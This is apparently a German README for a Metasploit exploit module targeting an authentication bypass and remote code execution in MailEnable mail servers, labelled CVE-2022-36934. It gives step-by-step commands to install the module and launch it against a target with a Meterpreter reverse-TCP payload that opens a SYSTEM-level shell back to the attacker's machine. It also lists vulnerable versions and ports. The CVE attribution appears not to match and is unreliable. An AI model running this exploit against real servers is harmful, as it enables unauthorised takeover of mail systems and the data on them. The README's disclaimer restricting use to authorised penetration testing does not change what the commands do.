
Metasploit-Modul für MailEnable CVE-2022-36934 Authentication-Bypass-RCE
Metasploit-Modul für die Authentifizierungsumgehungs-Sicherheitslücke (CVE-2022-36934) in MailEnable, die zu Remote-Code-Ausführung führt.
cp modules/exploits/windows/smtp/mailenable_authbypass_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/smtp/
reload_all
use exploit/windows/smtp/mailenable_authbypass_rce set RHOSTS <target_ip> set LHOST <your_ip> set PAYLOAD windows/x64/meterpreter/reverse_tcp exploit
🎯 Getestet gegen:
MailEnable Professional 10.25 Windows Server 2019 MailEnable Enterprise 10.30 Windows Server 2016
📝 Technische Details:
Sicherheitslücke: Authentifizierungsumgehung mittels SQLi-ähnlicher Syntax in SMTP/POP3
Angriffsvektor: Netzwerk (Ports 25/110)
Berechtigungen: Läuft als MailEnable-Dienstkonto (oft SYSTEM)
⚠️ Rechtlicher Hinweis:
Dieses Tool ist nur für autorisierte Tests bestimmt. Verwenden Sie es niemals gegen Systeme, die Sie nicht besitzen oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben.